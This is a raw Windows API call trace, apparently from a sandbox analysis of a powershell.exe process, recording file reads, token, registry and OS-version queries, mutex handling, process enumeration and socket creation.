	[0639.501] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd838, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd838*=0x1000, lpOverlapped=0x0) returned 1
	[0639.512] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd368, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd368*=0x1000, lpOverlapped=0x0) returned 1
	[0639.513] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd368, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd368*=0x1000, lpOverlapped=0x0) returned 1
	[0639.513] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd368, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd368*=0x1000, lpOverlapped=0x0) returned 1
	[0639.513] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd368, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd368*=0x1000, lpOverlapped=0x0) returned 1
	[0639.521] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.521] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd328, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd328*=0x22a, lpOverlapped=0x0) returned 1
	[0639.521] ReadFile (in: hFile=0x3b0, lpBuffer=0x2f98108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8fd3c8, lpOverlapped=0x0 | out: lpBuffer=0x2f98108*, lpNumberOfBytesRead=0x1c8fd3c8*=0x0, lpOverlapped=0x0) returned 1
	[0639.521] CloseHandle (hObject=0x3b0) returned 1
	[0639.522] CoTaskMemAlloc (cb=0x20c) returned 0x1b825180
	[0639.522] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b825180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0639.522] CoTaskMemFree (pv=0x1b825180) 
	[0639.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8fd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0639.523] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.523] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fdb28 | out: TokenHandle=0x1c8fdb28*=0x3b0) returned 1
	[0639.524] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.524] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fdb28 | out: TokenHandle=0x1c8fdb28*=0x3ac) returned 1
	[0639.525] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.525] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd8c8 | out: TokenHandle=0x1c8fd8c8*=0x354) returned 1
	[0639.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8fd920 | out: lpFileInformation=0x1c8fd920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0639.527] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.527] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fdb28 | out: TokenHandle=0x1c8fdb28*=0x37c) returned 1
	[0639.527] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.527] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fdb28 | out: TokenHandle=0x1c8fdb28*=0x380) returned 1
	[0644.512] GetCurrentProcess () returned 0xffffffffffffffff
	[0644.512] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd7a8 | out: TokenHandle=0x1c8fd7a8*=0x360) returned 1
	[0655.350] GetCurrentProcess () returned 0xffffffffffffffff
	[0655.350] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd7a8 | out: TokenHandle=0x1c8fd7a8*=0x37c) returned 1
	[0655.372] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b0
	[0655.372] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
	[0666.411] GetCurrentProcess () returned 0xffffffffffffffff
	[0666.411] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd778 | out: TokenHandle=0x1c8fd778*=0x3ac) returned 1
	[0674.813] GetCurrentProcess () returned 0xffffffffffffffff
	[0674.813] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd778 | out: TokenHandle=0x1c8fd778*=0x354) returned 1
	[0678.536] GetCurrentProcess () returned 0xffffffffffffffff
	[0678.536] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd6b8 | out: TokenHandle=0x1c8fd6b8*=0x384) returned 1
	[0678.544] GetCurrentProcess () returned 0xffffffffffffffff
	[0678.544] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd6b8 | out: TokenHandle=0x1c8fd6b8*=0x388) returned 1
	[0681.789] GetCurrentProcess () returned 0xffffffffffffffff
	[0681.789] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fdcf8 | out: TokenHandle=0x1c8fdcf8*=0x38c) returned 1
	[0695.500] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8fbdb8 | out: phkResult=0x1c8fbdb8*=0x390) returned 0x0
	[0695.500] RegQueryValueExW (in: hKey=0x390, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c8fbd3c, lpData=0x0, lpcbData=0x1c8fbd38*=0x0 | out: lpType=0x1c8fbd3c*=0x1, lpData=0x0, lpcbData=0x1c8fbd38*=0xe) returned 0x0
	[0695.500] CoTaskMemAlloc (cb=0x12) returned 0x1b864c10
	[0695.500] RegQueryValueExW (in: hKey=0x390, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c8fbd0c, lpData=0x1b864c10, lpcbData=0x1c8fbd08*=0xe | out: lpType=0x1c8fbd0c*=0x1, lpData="Client", lpcbData=0x1c8fbd08*=0xe) returned 0x0
	[0695.500] CoTaskMemFree (pv=0x1b864c10) 
	[0695.500] RegCloseKey (hKey=0x390) returned 0x0
	[0701.708] CoTaskMemAlloc (cb=0xcd0) returned 0x1b8681e0
	[0708.737] RasEnumConnectionsW (in: param_1=0x1b8681e0, param_2=0x1c8fdd4c, param_3=0x1c8fdd48 | out: param_1=0x1b8681e0, param_2=0x1c8fdd4c, param_3=0x1c8fdd48) returned 0x0
	[0708.742] CoTaskMemFree (pv=0x1b8681e0) 
	[0708.750] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c8fdb58 | out: lpWSAData=0x1c8fdb58) returned 0
	[0708.760] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d0
	[0711.552] setsockopt (s=0x3d0, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0711.552] closesocket (s=0x3d0) returned 0
	[0711.552] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d0
	[0711.554] setsockopt (s=0x3d0, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0711.554] closesocket (s=0x3d0) returned 0
	[0711.561] GetCurrentProcess () returned 0xffffffffffffffff
	[0711.561] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd3d8 | out: TokenHandle=0x1c8fd3d8*=0x3d0) returned 1
	[0711.574] GetCurrentProcess () returned 0xffffffffffffffff
	[0711.574] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd3d8 | out: TokenHandle=0x1c8fd3d8*=0x3d4) returned 1
	[0719.153] GetCurrentProcessId () returned 0xf64
	[0722.356] CoTaskMemAlloc (cb=0x204) returned 0x302260
	[0722.356] GetComputerNameW (in: lpBuffer=0x302260, nSize=0x2f85cb8 | out: lpBuffer="XDUWTFONO", nSize=0x2f85cb8) returned 1
	[0722.356] CoTaskMemFree (pv=0x302260) 
	[0722.357] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8fd8b8 | out: phkResult=0x1c8fd8b8*=0x3d8) returned 0x0
	[0722.357] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Library", lpReserved=0x0, lpType=0x1c8fd83c, lpData=0x0, lpcbData=0x1c8fd838*=0x0 | out: lpType=0x1c8fd83c*=0x1, lpData=0x0, lpcbData=0x1c8fd838*=0x1c) returned 0x0
	[0722.357] CoTaskMemAlloc (cb=0x20) returned 0x1b86cf30
	[0722.357] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Library", lpReserved=0x0, lpType=0x1c8fd80c, lpData=0x1b86cf30, lpcbData=0x1c8fd808*=0x1c | out: lpType=0x1c8fd80c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c8fd808*=0x1c) returned 0x0
	[0722.357] CoTaskMemFree (pv=0x1b86cf30) 
	[0722.357] RegQueryValueExW (in: hKey=0x3d8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c8fd83c, lpData=0x0, lpcbData=0x1c8fd838*=0x0 | out: lpType=0x1c8fd83c*=0x4, lpData=0x0, lpcbData=0x1c8fd838*=0x4) returned 0x0
	[0722.358] RegQueryValueExW (in: hKey=0x3d8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c8fd840, lpData=0x1c8fd83c, lpcbData=0x1c8fd838*=0x4 | out: lpType=0x1c8fd840*=0x4, lpData=0x1c8fd83c*=0x1, lpcbData=0x1c8fd838*=0x4) returned 0x0
	[0722.358] RegQueryValueExW (in: hKey=0x3d8, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c8fd83c, lpData=0x0, lpcbData=0x1c8fd838*=0x0 | out: lpType=0x1c8fd83c*=0x4, lpData=0x0, lpcbData=0x1c8fd838*=0x4) returned 0x0
	[0722.358] RegQueryValueExW (in: hKey=0x3d8, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c8fd840, lpData=0x1c8fd83c, lpcbData=0x1c8fd838*=0x4 | out: lpType=0x1c8fd840*=0x4, lpData=0x1c8fd83c*=0x137a, lpcbData=0x1c8fd838*=0x4) returned 0x0
	[0722.358] RegCloseKey (hKey=0x3d8) returned 0x0
	[0723.854] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8fd878 | out: phkResult=0x1c8fd878*=0x3d8) returned 0x0
	[0723.854] RegQueryValueExW (in: hKey=0x3d8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c8fd7fc, lpData=0x0, lpcbData=0x1c8fd7f8*=0x0 | out: lpType=0x1c8fd7fc*=0x4, lpData=0x0, lpcbData=0x1c8fd7f8*=0x4) returned 0x0
	[0723.854] RegQueryValueExW (in: hKey=0x3d8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c8fd800, lpData=0x1c8fd7fc, lpcbData=0x1c8fd7f8*=0x4 | out: lpType=0x1c8fd800*=0x4, lpData=0x1c8fd7fc*=0x3, lpcbData=0x1c8fd7f8*=0x4) returned 0x0
	[0723.854] RegQueryValueExW (in: hKey=0x3d8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c8fd7fc, lpData=0x0, lpcbData=0x1c8fd7f8*=0x0 | out: lpType=0x1c8fd7fc*=0x4, lpData=0x0, lpcbData=0x1c8fd7f8*=0x4) returned 0x0
	[0723.854] RegQueryValueExW (in: hKey=0x3d8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c8fd800, lpData=0x1c8fd7fc, lpcbData=0x1c8fd7f8*=0x4 | out: lpType=0x1c8fd800*=0x4, lpData=0x1c8fd7fc*=0x20000, lpcbData=0x1c8fd7f8*=0x4) returned 0x0
	[0723.854] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c8fd7fc, lpData=0x0, lpcbData=0x1c8fd7f8*=0x0 | out: lpType=0x1c8fd7fc*=0x3, lpData=0x0, lpcbData=0x1c8fd7f8*=0xaa) returned 0x0
	[0723.854] RegQueryValueExW (in: hKey=0x3d8, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c8fd7fc, lpData=0x2f88fa8, lpcbData=0x1c8fd7f8*=0xaa | out: lpType=0x1c8fd7fc*=0x3, lpData=0x2f88fa8*, lpcbData=0x1c8fd7f8*=0xaa) returned 0x0
	[0723.858] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0725.550] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c8fd7b0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0725.552] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3e0
	[0725.554] MapViewOfFile (hFileMappingObject=0x3e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x27e0000
	[0725.555] VirtualQuery (in: lpAddress=0x27e0000, lpBuffer=0x1c8fd7a8, dwLength=0x30 | out: lpBuffer=0x1c8fd7a8*(BaseAddress=0x27e0000, AllocationBase=0x27e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0725.556] LocalFree (hMem=0x31dde0) returned 0x0
	[0725.556] RegCloseKey (hKey=0x3d8) returned 0x0
	[0727.276] GetVersionExW (in: lpVersionInformation=0x1c8fc780*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c8fc780*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0727.277] GetVersionExW (in: lpVersionInformation=0x1c8fc750*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c8fc750*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0727.278] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f89c78, cbSid=0x1c8fd790 | out: pSid=0x2f89c78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd790) returned 1
	[0729.115] CreateMutexW (lpMutexAttributes=0x2f89e80, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0729.116] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0729.120] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x102
	[0733.161] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0733.162] GetCurrentProcessId () returned 0xf64
	[0733.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e4
	[0733.164] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c8fd6a0, lpExitTime=0x1c8fd698, lpKernelTime=0x1c8fd690, lpUserTime=0x1c8fd688 | out: lpCreationTime=0x1c8fd6a0, lpExitTime=0x1c8fd698, lpKernelTime=0x1c8fd690, lpUserTime=0x1c8fd688) returned 1
	[0733.164] CloseHandle (hObject=0x3e4) returned 1
	[0733.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x3e4
	[0733.165] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c8fd730, lpExitTime=0x1c8fd728, lpKernelTime=0x1c8fd720, lpUserTime=0x1c8fd718 | out: lpCreationTime=0x1c8fd730, lpExitTime=0x1c8fd728, lpKernelTime=0x1c8fd720, lpUserTime=0x1c8fd718) returned 1
	[0733.165] CloseHandle (hObject=0x3e4) returned 1
	[0733.165] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x3e4
	[0733.166] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.166] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.167] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8fd688, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8fd688*=0x3e8) returned 1
	[0733.169] CloseHandle (hObject=0x3e8) returned 1
	[0733.169] CloseHandle (hObject=0x3e4) returned 1
	[0733.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3e4
	[0733.169] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c8fd730, lpExitTime=0x1c8fd728, lpKernelTime=0x1c8fd720, lpUserTime=0x1c8fd718 | out: lpCreationTime=0x1c8fd730, lpExitTime=0x1c8fd728, lpKernelTime=0x1c8fd720, lpUserTime=0x1c8fd718) returned 1
	[0733.169] CloseHandle (hObject=0x3e4) returned 1
	[0733.169] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3e4
	[0733.169] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.169] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.169] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8fd688, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8fd688*=0x3e8) returned 1
	[0733.170] CloseHandle (hObject=0x3e8) returned 1
	[0733.170] CloseHandle (hObject=0x3e4) returned 1
	[0733.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x3e4
	[0733.170] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c8fd730, lpExitTime=0x1c8fd728, lpKernelTime=0x1c8fd720, lpUserTime=0x1c8fd718 | out: lpCreationTime=0x1c8fd730, lpExitTime=0x1c8fd728, lpKernelTime=0x1c8fd720, lpUserTime=0x1c8fd718) returned 1
	[0733.170] CloseHandle (hObject=0x3e4) returned 1
	[0733.170] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x3e4
	[0733.170] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.170] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.171] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8fd688, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8fd688*=0x3e8) returned 1
	[0733.171] CloseHandle (hObject=0x3e8) returned 1
	[0733.171] CloseHandle (hObject=0x3e4) returned 1
	[0733.173] ReleaseMutex (hMutex=0x3d8) returned 1
	[0733.173] CloseHandle (hObject=0x3d8) returned 1
	[0734.572] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f8ae60, cbSid=0x1c8fd790 | out: pSid=0x2f8ae60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd790) returned 1
	[0734.572] CreateMutexW (lpMutexAttributes=0x2f8b018, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.572] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.573] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.573] CloseHandle (hObject=0x3d8) returned 1
	[0734.573] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f8bc88, cbSid=0x1c8fd790 | out: pSid=0x2f8bc88*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd790) returned 1
	[0734.573] CreateMutexW (lpMutexAttributes=0x2f8be40, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.574] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.574] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.574] CloseHandle (hObject=0x3d8) returned 1
	[0734.575] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f8cac0, cbSid=0x1c8fd790 | out: pSid=0x2f8cac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd790) returned 1
	[0734.575] CreateMutexW (lpMutexAttributes=0x2f8cc78, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.575] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.576] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.576] CloseHandle (hObject=0x3d8) returned 1
	[0734.576] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f8d8f0, cbSid=0x1c8fd790 | out: pSid=0x2f8d8f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd790) returned 1
	[0734.576] CreateMutexW (lpMutexAttributes=0x2f8daa8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.576] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.577] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.577] CloseHandle (hObject=0x3d8) returned 1
	[0734.579] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f8e720, cbSid=0x1c8fd740 | out: pSid=0x2f8e720*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd740) returned 1
	[0734.579] CreateMutexW (lpMutexAttributes=0x2f8e8d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.580] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.580] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.580] CloseHandle (hObject=0x3d8) returned 1
	[0734.581] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f8f568, cbSid=0x1c8fd740 | out: pSid=0x2f8f568*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd740) returned 1
	[0734.581] CreateMutexW (lpMutexAttributes=0x2f8f720, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.581] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.582] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.582] CloseHandle (hObject=0x3d8) returned 1
	[0734.582] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f90380, cbSid=0x1c8fd740 | out: pSid=0x2f90380*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd740) returned 1
	[0734.582] CreateMutexW (lpMutexAttributes=0x2f90538, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.582] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.583] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.583] CloseHandle (hObject=0x3d8) returned 1
	[0734.583] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f911a8, cbSid=0x1c8fd740 | out: pSid=0x2f911a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd740) returned 1
	[0734.583] CreateMutexW (lpMutexAttributes=0x2f91360, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.583] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.584] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.584] CloseHandle (hObject=0x3d8) returned 1
	[0734.585] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f91fc8, cbSid=0x1c8fd740 | out: pSid=0x2f91fc8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8fd740) returned 1
	[0734.585] CreateMutexW (lpMutexAttributes=0x2f92180, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.585] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.586] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.586] CloseHandle (hObject=0x3d8) returned 1
	[0736.157] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d8
	[0736.158] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4
	[0736.158] ioctlsocket (in: s=0x3d8, cmd=-2147195266, argp=0x1c8fdd78 | out: argp=0x1c8fdd78) returned 0
	[0736.159] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e8
	[0736.159] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ec
	[0736.159] ioctlsocket (in: s=0x3e8, cmd=-2147195266, argp=0x1c8fdd78 | out: argp=0x1c8fdd78) returned 0
